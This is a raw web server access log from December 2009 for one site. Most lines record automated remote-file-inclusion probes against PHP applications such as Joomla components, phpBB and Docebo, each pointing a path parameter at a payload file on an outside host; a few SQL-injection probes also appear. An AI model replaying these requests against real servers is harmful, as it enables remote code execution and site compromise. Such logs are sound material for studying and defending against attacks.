193.4.113.98 - - [14/Dec/2009:12:15:09 -0800] "GET /logs/access_090504.log%20%20/base.php?f1=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:12:15:10 -0800] "GET /logs/access_081202.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:12:15:12 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:12:15:12 -0800] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:12:15:12 -0800] "GET /logs/access_081226.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:12:15:13 -0800] "GET /logs/access_081202.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:12:15:22 -0800] "GET /bikes/dteel/2008_02_08/ HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:12:15:32 -0800] "GET /logs/access_090504.log/base.php?f1=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:12:15:39 -0800] "GET /logs/access_080906.log%20%20//index.php?DOCUMENT_ROOT=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
62.75.174.29 - - [14/Dec/2009:12:15:45 -0800] "GET /logs/access_091130.log/store.php?itemid=' HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.174.29 - - [14/Dec/2009:12:15:45 -0800] "GET /store.php?itemid=' HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.174.29 - - [14/Dec/2009:12:15:46 -0800] "GET /logs/store.php?itemid=' HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:12:15:46 -0800] "GET /logs/access_080906.log//index.php?DOCUMENT_ROOT=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.4.113.98 - - [14/Dec/2009:12:15:51 -0800] "GET /logs/access_090504.log/base.php?f1=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:16:22 -0800] "GET /logs/access_080226.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:12:16:24 -0800] "GET /logs/access_081226.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:12:16:24 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:12:16:24 -0800] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:12:16:25 -0800] "GET /logs/access_081202.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:12:16:28 -0800] "GET /logs/access_081012.log//index.php?DOCUMENT_ROOT=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:12:16:28 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:12:16:29 -0800] "GET /index.php?DOCUMENT_ROOT=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 200 14813 "-" "Mozilla/5.0" "www.dmulk.com"
207.228.240.75 - - [14/Dec/2009:12:16:36 -0800] "GET /logs/index.php?id=&lang=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
207.228.240.75 - - [14/Dec/2009:12:16:36 -0800] "GET /logs/access_080410.log/index.php?id=&lang=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:16:36 -0800] "GET /logs/access_080226.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.228.240.75 - - [14/Dec/2009:12:16:36 -0800] "GET /index.php?id=&lang=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 200 14807 "-" "-" "www.dmulk.com"
62.75.174.29 - - [14/Dec/2009:12:16:40 -0800] "GET /store.php?itemid=' HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:16:43 -0800] "GET /logs/access_080226.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.228.240.4 - - [14/Dec/2009:12:16:56 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 200 14945 "-" "Mozilla/5.0" "www.dmulk.com"
95.110.198.81 - - [14/Dec/2009:12:17:03 -0800] "GET /logs/access_081008.log//index.php?DOCUMENT_ROOT=http://calvaryus.org/bbs//skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [14/Dec/2009:12:17:12 -0800] "GET /logs/access_080410.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://esboxvps.com/unix1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [14/Dec/2009:12:17:16 -0800] "GET /logs/access_080226.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://esboxvps.com/unix1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:12:17:17 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:12:17:17 -0800] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:12:17:18 -0800] "GET /logs/access_081226.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:12:17:18 -0800] "GET /logs/access_081202.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.54.22.2 - - [14/Dec/2009:12:17:39 -0800] "GET /logs/access_080330.log%20%20//skin/zero_vote/ask_password.php?dir=http://kb27.co.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:17:52 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:17:52 -0800] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:17:52 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:17:53 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:17:53 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:17:53 -0800] "GET /logs/access_080702.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:17:57 -0800] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:17:57 -0800] "GET /logs/access_080319.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.54.22.2 - - [14/Dec/2009:12:18:12 -0800] "GET /logs/access_080330.log%20%20//skin/zero_vote/ask_password.php?dir=http://kb27.co.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.54.22.2 - - [14/Dec/2009:12:18:13 -0800] "GET /logs/access_091203.log%20%20//skin/zero_vote/ask_password.php?dir=http://kb27.co.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:12:18:44 -0800] "GET /logs/access_080224.log HTTP/1.0" 200 1720515 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.54.22.2 - - [14/Dec/2009:12:19:07 -0800] "GET /logs/access_091203.log%20%20//skin/zero_vote/ask_password.php?dir=http://kb27.co.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:12:19:13 -0800] "GET /logs/access_081226.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:12:19:14 -0800] "GET /logs/access_081202.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:12:19:16 -0800] "GET /logs/access_081226.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:12:19:17 -0800] "GET /logs/access_081202.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:19:24 -0800] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:19:24 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:19:24 -0800] "GET /logs/access_081226.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:19:25 -0800] "GET /logs/access_081202.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:12:19:27 -0800] "GET /logs/access_081226.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [14/Dec/2009:12:19:27 -0800] "GET /logs/access_081202.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:19:33 -0800] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:19:33 -0800] "GET /logs/access_081226.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:19:33 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:19:34 -0800] "GET /logs/access_081202.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
122.201.81.160 - - [14/Dec/2009:12:19:34 -0800] "GET /logs/access_090417.log%20/image.php?img=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:12:19:53 -0800] "GET /logs/access_081226.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:12:19:53 -0800] "GET /logs/access_081202.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.32 - - [14/Dec/2009:12:20:23 -0800] "GET /logs/access_070725.log HTTP/1.0" 200 66166 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:22:26 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:22:26 -0800] "GET /logs/access_081204.log//include/admin.lib.inc.php?site_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:22:26 -0800] "GET /include/admin.lib.inc.php?site_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:22:26 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:22:32 -0800] "GET /logs/access_081204.log%20%20//include/admin.lib.inc.php?site_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:22:32 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:22:32 -0800] "GET /include/admin.lib.inc.php?site_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:12:22:32 -0800] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [14/Dec/2009:12:22:45 -0800] "GET /logs/access_090922.log/////?_zb_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.228.240.4 - - [14/Dec/2009:12:23:18 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:23:45 -0800] "GET /logs/access_081226.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:23:45 -0800] "GET /logs/access_081202.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:23:47 -0800] "GET /logs/access_081226.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:12:23:47 -0800] "GET /logs/access_081202.log%20%20//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.245.165.135 - - [14/Dec/2009:12:24:19 -0800] "GET /docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.245.165.135 - - [14/Dec/2009:12:24:19 -0800] "GET /logs/access_080211.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.245.165.135 - - [14/Dec/2009:12:24:19 -0800] "GET /logs//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.245.165.135 - - [14/Dec/2009:12:24:20 -0800] "GET /docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.245.165.135 - - [14/Dec/2009:12:24:20 -0800] "GET /logs//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.245.165.135 - - [14/Dec/2009:12:24:20 -0800] "GET /logs/access_080211.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.228.240.4 - - [14/Dec/2009:12:24:34 -0800] "GET /logs/access_091129.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.228.240.4 - - [14/Dec/2009:12:24:34 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.228.240.4 - - [14/Dec/2009:12:24:34 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.228.240.4 - - [14/Dec/2009:12:24:34 -0800] "GET /logs/access_091111.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.245.165.135 - - [14/Dec/2009:12:25:31 -0800] "GET /logs/access_080701.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.245.165.135 - - [14/Dec/2009:12:25:36 -0800] "GET /logs/access_080701.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.228.240.4 - - [14/Dec/2009:12:26:09 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 200 14944 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:26:54 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:26:54 -0800] "GET /logs/access_081023.log%20%20//include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:26:54 -0800] "GET /include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:26:56 -0800] "GET /include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:26:56 -0800] "GET /logs/access_081023.log%20%20//include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:26:56 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:27:11 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:27:11 -0800] "GET /include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:27:11 -0800] "GET /logs/access_081023.log%20%20//include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:27:22 -0800] "GET /logs/access_091002.log%20%20//include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:27:25 -0800] "GET /include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:27:25 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:27:25 -0800] "GET /logs/access_081023.log%20%20//include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:27:29 -0800] "GET /logs/access_091002.log%20%20//include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:27:38 -0800] "GET /logs/access_091002.log%20%20//include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [14/Dec/2009:12:27:49 -0800] "GET /logs/access_091002.log%20%20//include/mail.inc.php?skin_board_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:12:29:19 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:12:29:19 -0800] "GET /logs/access_080521.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:12:29:19 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:12:29:19 -0800] "GET /logs/access_080515.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:12:29:27 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:12:29:27 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:12:29:27 -0800] "GET /logs/access_080515.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [14/Dec/2009:12:29:27 -0800] "GET /logs/access_080521.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
